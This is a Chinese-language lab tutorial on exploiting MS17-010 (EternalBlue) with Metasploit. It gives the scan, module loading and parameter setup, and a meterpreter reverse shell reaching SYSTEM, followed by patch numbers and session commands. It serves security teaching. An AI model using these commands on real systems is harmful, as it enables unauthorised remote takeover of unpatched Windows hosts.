漏洞背景
漏洞编号:MS17-010 / CVE-2017-0144
命名规则:
- MS:Microsoft(微软)
- 17:2017年
- 010:编号
历史背景:
方程式组织(Equation Group)
↓
美国NSA下属的顶级黑客组织
↓
影子经纪人(Shadow Brokers)入侵方程式
↓
2017年公开武器库部分工具
↓
永恒之蓝(EternalBlue)
古怪地鼠(DoublePulsar)
爱斯基摩卷(EskimoRoll)
影响范围:
- Windows XP
- Windows 7
- Windows Server 2008
- Windows Server 2012(部分)
攻击条件:
必须同时开放:
- 135端口(RPC服务)
- 445端口(SMB服务 microsoft-ds)
漏洞利用实战
目标扫描
bash
# 使用Nmap扫描目标
nmap -sV 192.168.87.142
# 关键信息:
# 135/tcp open msrpc
# 445/tcp open microsoft-ds
加载漏洞模块
bash
# MSF控制台中加载永恒之蓝
use exploit/windows/smb/ms17_010_eternalblue
# 查看需要配置的参数
show options
# 关键参数:
# RHOSTS - 目标IP地址(Required: yes)
# RPORT - 目标端口(默认445)
# LHOST - 本地IP(自动识别)
# LPORT - 本地监听端口(默认4444)
配置攻击参数
bash
# 设置目标IP
set rhosts 192.168.87.142
# 再次查看配置(可选)
show options
# 确认payload(攻击载荷)
# 默认:windows/x64/meterpreter/reverse_tcp
执行攻击
bash
# 运行攻击
run
# 或
exploit
# 成功标志:
# [*] Sending stage...
# [*] Meterpreter session 1 opened
# [+] WIN!
注意事项:
- 虚拟机必须使用桥接模式
- NAT模式会导致无法建立会话
- 错误提示:
Exploit completed, but no session was created
漏洞补丁
修复补丁编号:
- KB4012212(主要补丁)
- KB4474419
- KB2534111
- KB2999226
- KB976902
会话管理
bash
# 获取系统权限信息
getuid
# 输出示例:NT AUTHORITY\SYSTEM
# 进入系统Shell
shell
# Windows命令操作
cd C:\
mkdir test
dir
rmdir test
# 退出Shell返回Meterpreter
exit
# 将会话放到后台
background
# 查看所有会话
sessions
# 重新连接指定会话
sessions -i 1
# 完全退出
exit